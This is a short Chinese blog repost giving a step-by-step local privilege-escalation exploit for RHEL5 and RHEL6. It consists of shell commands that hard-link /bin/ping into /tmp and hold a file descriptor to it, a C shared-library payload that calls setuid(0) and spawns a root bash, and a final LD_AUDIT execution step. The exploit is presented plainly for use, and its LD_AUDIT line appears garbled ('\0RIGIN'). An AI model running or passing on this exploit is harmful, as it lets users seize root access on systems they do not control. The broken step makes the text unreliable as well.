首页 > 代码库 > 普通用户提权
普通用户提权
说明:RHEL5—RHEL6下 都可以提权
1. ls -ld /tmp/
2. ls -l /bin/ping
3. mkdir /tmp/exploit ; ln /bin/ping /tmp/exploit/target
4. exec 3< /tmp/exploit/target ; rm -rf /tmp/exploit/ ; ls -l /proc/$$/fd/3
5. vim payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
6. gcc -w -fPIC -shared -o /tmp/exploit payload.c ; ls -l /tmp/exploit
7. LD_AUDIT="\0RIGIN" exec /proc/self/fd/3
本文出自 “一马踏平川” 博客,请务必保留此出处http://huangzp.blog.51cto.com/12434999/1911772
普通用户提权
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。